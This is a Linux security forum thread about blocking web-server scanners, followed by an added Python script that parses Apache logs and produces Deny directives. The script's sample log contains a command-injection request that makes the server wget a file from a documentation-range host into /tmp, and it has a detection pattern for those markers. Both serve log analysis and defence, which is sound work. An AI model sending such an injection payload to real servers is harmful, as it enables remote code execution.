Linux - Security
This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
I'm running Apache on a Debian Sarge server. Every day I check the log files and I see people trying to open directories I don't have in my web path. I take their IPs and add them to my hosts.deny file.
How much can this slow down your system? I have several entries in my hosts.deny file and they're growing almost daily. How much of a problem does this pose?
True, and I've wondered how futile it is to do this. But I really hate it when people try to get in and illegally mine data. It really gets to me. So putting their IPs in hosts.deny at least keeps them from coming back.
Do you recommend something else? I'm open to ideas. What's happening is I see in my apache2/error.log entries like "<host IP> /www/php/sumthin.php 404 ...." and there will be dozens of attempts from the same IP. I'll take the IP and enter it into hosts.deny and they don't come back.
Well, there is a method to add temporary rules to the firewall if there are too many failed attempts to log in. Won't work with a web server though, legit clients can make multiple requests too. I'd recommend you get used to this. I was worried too when I saw the auth.log of my first server. Looong lists of dictionary hackers, daily. Now I don't care. I know they cannot get in and this is all that matters.
My auth.log files are okay. I run a program called authfail that automatically logs 3 failed attempts and adds them to iptables to drop their connection. It works great and keeps people out. I highly recommend it.
What concerns me are attacks on my web server. I've had it attacked and broken into twice in 2003 and I'm kinda paranoid about it. Anything I can do to keep them bastards out I will. When I trace down some of the IPs I notice that some are coming from .ro and I know no one legit is looking at my web server from there!
I just wanted to make sure I wasn't bulking down my server by having too many entries in hosts.deny. I am noticing fewer and fewer entries in my logs; it must be working to some degree.
Check out authfail -- it's almost perfectly automatic.
Note that Apache does not have support for hosts.deny (libwrap/tcp_wrappers) by default, so using it for access control does nothing. If you want to ban them use iptables or Apache's built-in access control features.
Adding huge numbers of hosts to iptables or hosts.deny will eventually slow the system down, so trying to ban IPs for random scanning is a lost cause IMHO. Save bannination for persistent abusers and spend the time hardening your system against exploitation and making sure it's updated with security patches.
So using hosts.deny doesn't stop them from accessing Apache, so using it was futile anyway.
Take a look at mod_security if you are interested in implementing a little more preventative security measures for Apache. Creating custom filters to block typical PHP and XML-RPC scans that are common isn't very difficult and you can even create filters to block 0-day exploits that attempt code injection (like URLs containing the string "wget" or "/tmp").
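The thread makes three points that fit together: hosts.deny does nothing for Apache, only persistent abusers are worth banning, and the things worth filtering are the scan/injection markers (URLs containing "wget" or "/tmp") that a mod_security filter would catch. The script below is an added example, not code from the thread or from mod_security: it reads Apache "combined" access-log lines (the access log rather than error.log, because it carries the status code and the full request line including the query string), counts requests for non-existent files per client so that only clients over a threshold are reported, flags any request whose URL-decoded URI contains the two markers, and renders the result as Apache 2.0 mod_access `Deny from` directives, which is the built-in access control the thread recommends over hosts.deny. The log lines and addresses are constructed sample data (RFC 5737 documentation ranges); the threshold of 3 is an assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access.log lines in Apache's "combined" format. Addresses are
# RFC 5737 documentation ranges, not real hosts. One client hammers non-existent
# PHP/CGI paths and then sends a request carrying the markers the thread mentions;
# the other is an ordinary browser that merely misses favicon.ico.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [12/Mar/2006:10:00:01 +0000] "GET /php/sumthin.php HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [12/Mar/2006:10:00:01 +0000] "GET /xmlrpc.php HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [12/Mar/2006:10:00:02 +0000] "GET /phpBB/viewtopic.php HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [12/Mar/2006:10:00:02 +0000] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 291 "-" "-"
192.0.2.10 - - [12/Mar/2006:10:00:03 +0000] "GET /index.php?cmd=wget%20http://203.0.113.5/x%20-O%20/tmp/x HTTP/1.0" 200 512 "-" "-"
198.51.100.7 - - [12/Mar/2006:10:05:00 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2006:10:05:01 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

# One "combined" line: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Markers the thread names as typical of code-injection probes. They are matched
# against the URL-decoded URI so that %20 / %2F encoding cannot hide them.
INJECTION_MARKERS = re.compile(r"wget|/tmp", re.IGNORECASE)


def parse_line(line):
    """Return (ip, uri, status) for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split(" ")          # "GET /uri HTTP/1.0"
    uri = parts[1] if len(parts) >= 2 else m.group("request")
    return m.group("ip"), uri, int(m.group("status"))


def analyze(log_text, threshold=3):
    """Aggregate the log: 404 bursts per client and requests carrying injection markers.

    Only clients with at least `threshold` requests for non-existent files are
    reported, so a legitimate browser that misses favicon.ico is not treated as
    a scanner (the thread's point that legit clients make multiple requests too).
    """
    not_found = Counter()
    injection_attempts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue                                 # skip lines in another format
        ip, uri, status = parsed
        if status == 404:
            not_found[ip] += 1
        if INJECTION_MARKERS.search(unquote(uri)):
            injection_attempts.append((ip, uri))
    persistent = {ip: n for ip, n in not_found.items() if n >= threshold}
    return {"persistent_404": persistent, "injection_attempts": injection_attempts}


def apache_deny_directive(ips):
    """Render Apache 2.0 mod_access directives denying the given clients.

    This is Apache's own access control (the alternative to hosts.deny named in the
    thread); the output belongs inside a <Directory> or <Location> block.
    """
    lines = ["Order allow,deny", "Allow from all"]
    lines += ["Deny from %s" % ip for ip in sorted(set(ips))]
    return "\n".join(lines)


if __name__ == "__main__":
    report = analyze(SAMPLE_ACCESS_LOG)
    for ip, n in report["persistent_404"].items():
        print("%s: %d requests for non-existent files" % (ip, n))
    for ip, uri in report["injection_attempts"]:
        print("%s: injection markers in %s" % (ip, uri))
    print(apache_deny_directive(report["persistent_404"]))
```

Run against the sample, the scanner is the only client over the threshold and the only one with a flagged request, while the browser that missed favicon.ico is left alone. The same two markers are what a mod_security filter would be written to match at request time; the difference is that this script works after the fact from the log, which is enough for the "persistent abuser" decision the thread recommends while leaving in-line blocking to mod_security.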